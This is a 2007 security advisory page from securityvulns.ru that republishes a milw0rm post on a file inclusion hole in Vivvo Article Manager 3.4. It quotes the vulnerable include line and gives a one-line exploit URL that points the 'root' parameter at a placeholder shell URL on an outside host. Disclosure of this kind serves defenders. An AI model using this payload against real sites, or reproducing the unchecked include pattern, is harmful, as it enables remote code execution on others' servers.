Computer Security

Security Advisory: Vivvo Article Manager 3.4 (root) Local File Inclusion Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  ESupport Multiple HTML Injection Vulnerabilities

  MediaWiki Cross-site Scripting

  XLAtunes 0.1 (album) Remote SQL Injection Vulnerability

  MyCalendar multiple XSS

From:MILW0RM <submit_(at)_milw0rm.com>
Date:20.02.2007
Subject:Vivvo Article Manager 3.4 (root) Local File Inclusion Vulnerability

=================================================================================
==================
Author: Snip0r
Script Name: Vivvo Article Manager v 3.4
Website: www.vivvo.net
=================================================================================
==================
Codesnippet of vulnerable script ("./include/db_conn.php"):

if (file_exists($ext_base_conf_file)) include_once($ext_base_conf_file);
=================================================================================
==================
Exploit:

http://victim.com/ [Vivvo Article Manager Path] / include / db_conn.php?root=[SHELL_URL]?
=================================================================================
==================
Greets fly out to: D-T-O, Blutkehle666,Chris,Doc,Legija0ne,Higgy,Anthra><,Basti and bi0
=================================================================================
==================

# milw0rm.com [2007-02-16]
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server